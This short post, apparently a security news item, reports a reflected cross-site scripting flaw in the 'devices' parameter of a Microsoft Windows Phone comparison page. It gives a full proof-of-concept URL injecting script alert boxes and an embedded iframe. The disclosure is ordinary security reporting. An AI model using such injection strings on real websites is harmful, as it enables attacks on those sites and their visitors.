Earlier this month, Security Researcher @flexxpoint discovered Cross site scripting vulnerability in the official website of Microsoft(microsoft.com). Now, one more XSS vulnerability has been found by GreyHat hacker "Sony" and Flexxpoint.
The "devices" field in the 'Compare Windows Phones' page of Microsoft.com is found to be vulnerable to this attack.
POC:Yet,They haven't fix the previous XSS find. It seems that Microsoft don't care about the vulnerability in their website.
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=""><script>alert("XSS by Sony and Flexxpoint")</script><script>alert("Oh..")</script><script>alert("Uh..")</script><script>alert("wow..")</script><script>alert("Microsoft.com Cross Site Scripting")</script><script>alert("meow!")</script><iframe width="420" height="315" src="http://www.youtube.com/embed/SLcBI3JUKZ4" frameborder="0" allowfullscreen></iframe>
